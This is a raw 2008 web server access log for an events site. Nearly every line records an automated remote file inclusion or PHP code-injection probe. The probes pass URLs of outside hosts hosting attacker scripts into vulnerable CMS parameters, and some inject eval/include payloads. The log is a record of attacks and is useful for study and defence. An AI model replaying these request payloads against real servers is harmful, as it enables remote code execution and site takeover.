211.51.221.135 - - [03/Dec/2008:07:27:44 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.43.212.94 - - [03/Dec/2008:07:27:56 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "serevents.com"
211.43.212.94 - - [03/Dec/2008:07:27:56 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "serevents.com"
211.43.212.94 - - [03/Dec/2008:07:27:59 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.blogstorrent.com/blogstorrent-selling/includes/ChuCu/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:18 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:18 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:18 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:20 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:21 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:23 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:29 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:29 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
86.109.98.224 - - [03/Dec/2008:07:28:29 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://drealpunisher.t35.com/bot/hezid2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:29 -0800] "GET /logs/access_081101.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:28:29 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:00 -0800] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:00 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:00 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:07 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:07 -0800] "GET /logs/access_081101.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:29:07 -0800] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:29:27 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:29:27 -0800] "GET /?path%5Bdocroot%5D=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
61.197.228.84 - - [03/Dec/2008:07:29:28 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.mm-speech.de/1/l333tbi1tX.txt???? HTTP/1.1" 200 943 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:29:31 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:29:31 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:29:32 -0800] "GET /phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:29:32 -0800] "GET /phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:30:18 -0800] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:30:18 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 200 943 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
12.184.45.114 - - [03/Dec/2008:07:30:18 -0800] "GET /?path%5Bdocroot%5D=http://www.zamovsoft.com/89f07f64ff3bedda1ac5c045c69d8866/l333tbi1tX.txt???? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:32:22 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:32:22 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
206.221.191.132 - - [03/Dec/2008:07:38:10 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.serevents.com"
206.221.191.132 - - [03/Dec/2008:07:38:10 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.serevents.com"
206.221.191.132 - - [03/Dec/2008:07:38:10 -0800] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:38:42 -0800] "GET /logs/access_081101.log/ashnews.php?pathtoashnews=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:38:42 -0800] "GET /ashnews.php?pathtoashnews=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:38:43 -0800] "GET /logs/ashnews.php?pathtoashnews=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
77.79.246.241 - - [03/Dec/2008:07:39:44 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
77.79.246.241 - - [03/Dec/2008:07:39:44 -0800] "GET /phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
77.79.246.241 - - [03/Dec/2008:07:39:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "serevents.com"
77.232.66.107 - - [03/Dec/2008:07:43:41 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
77.232.66.107 - - [03/Dec/2008:07:43:41 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://bl4ckb0t.com/bot/arab/id.la???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:07:46:29 -0800] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:07:46:29 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:07:46:57 -0800] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:07:46:58 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.serevents.com"
82.78.216.197 - - [03/Dec/2008:07:50:43 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "serevents.com"
82.78.216.197 - - [03/Dec/2008:07:50:43 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://ingenieria.unilibrecali.edu.co/bot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "serevents.com"
211.245.23.158 - - [03/Dec/2008:07:58:18 -0800] "GET /logs/access_081101.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:58:18 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:07:58:19 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:00:58 -0800] "GET /logs/addevent.inc.php?agendax_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:00:59 -0800] "GET /addevent.inc.php?agendax_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
203.116.63.71 - - [03/Dec/2008:08:01:09 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
203.116.63.71 - - [03/Dec/2008:08:01:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
203.116.63.71 - - [03/Dec/2008:08:01:09 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "serevents.com"
209.90.77.4 - - [03/Dec/2008:08:01:13 -0800] "GET /index.php?site_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
85.90.225.108 - - [03/Dec/2008:08:02:39 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
85.90.225.108 - - [03/Dec/2008:08:02:39 -0800] "GET /include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
85.90.225.108 - - [03/Dec/2008:08:02:39 -0800] "GET /logs//include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
203.116.63.71 - - [03/Dec/2008:08:03:09 -0800] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.serevents.com"
203.116.63.71 - - [03/Dec/2008:08:03:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.serevents.com"
203.116.63.71 - - [03/Dec/2008:08:03:09 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.serevents.com"
85.90.225.108 - - [03/Dec/2008:08:06:29 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
85.90.225.108 - - [03/Dec/2008:08:06:29 -0800] "GET /include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
85.90.225.108 - - [03/Dec/2008:08:06:29 -0800] "GET /logs//include/lib.inc.php?site_path=http://forum.happybass.com/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "serevents.com"
212.69.211.253 - - [03/Dec/2008:08:10:35 -0800] "GET /logs/errors.php?error=http://www.webviews.co.uk/weather/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.serevents.com"
212.69.211.253 - - [03/Dec/2008:08:10:35 -0800] "GET /errors.php?error=http://www.webviews.co.uk/weather/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.73" "www.serevents.com"
69.50.213.186 - - [03/Dec/2008:08:16:06 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
69.50.213.186 - - [03/Dec/2008:08:16:06 -0800] "GET /include/lib.inc.php?site_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
69.50.213.186 - - [03/Dec/2008:08:16:06 -0800] "GET /logs//include/lib.inc.php?site_path=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "serevents.com"
84.234.16.15 - - [03/Dec/2008:08:16:41 -0800] "GET /include/lib.inc.php?site_path=http://bjork.4mg.com/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "serevents.com"
211.245.23.158 - - [03/Dec/2008:08:16:47 -0800] "GET /logs/access.log//class/class.dashboard_cms.php?where_framework=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:16:48 -0800] "GET /class/class.dashboard_cms.php?where_framework=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:16:49 -0800] "GET /logs//class/class.dashboard_cms.php?where_framework=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:17:51 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.245.23.158 - - [03/Dec/2008:08:17:52 -0800] "GET /include/lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
211.245.23.158 - - [03/Dec/2008:08:17:53 -0800] "GET /logs//include/lib.inc.php?site_path=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "serevents.com"
84.234.16.15 - - [03/Dec/2008:08:18:05 -0800] "GET /logs/access.log//include/lib.inc.php?site_path=http://bjork.4mg.com/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "serevents.com"
84.234.16.15 - - [03/Dec/2008:08:18:05 -0800] "GET /include/lib.inc.php?site_path=http://bjork.4mg.com/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "serevents.com"
84.234.16.15 - - [03/Dec/2008:08:18:05 -0800] "GET /logs//include/lib.inc.php?site_path=http://bjork.4mg.com/bjorkid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "serevents.com"
209.90.77.4 - - [03/Dec/2008:08:21:46 -0800] "GET /logs/access.log//index.php?site_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:08:21:46 -0800] "GET /index.php?site_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
209.90.77.4 - - [03/Dec/2008:08:21:46 -0800] "GET /logs//index.php?site_path=http://geocities.com/axenses/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "serevents.com"
213.170.44.18 - - [03/Dec/2008:08:21:53 -0800] "GET /logs/access.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
213.170.44.18 - - [03/Dec/2008:08:21:54 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
213.170.44.18 - - [03/Dec/2008:08:21:54 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tibiiabr.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.serevents.com"
89.111.176.53 - - [03/Dec/2008:08:24:53 -0800] "GET /logs/access.log/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.111.176.53 - - [03/Dec/2008:08:24:54 -0800] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
89.111.176.53 - - [03/Dec/2008:08:24:54 -0800] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.reviewtrust.co.uk/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "serevents.com"
72.30.78.242 - - [03/Dec/2008:08:32:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:42:38 -0800] "GET /logs/access_081101.log/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:42:39 -0800] "GET /libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
211.245.23.158 - - [03/Dec/2008:08:42:40 -0800] "GET /logs/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.serevents.com"
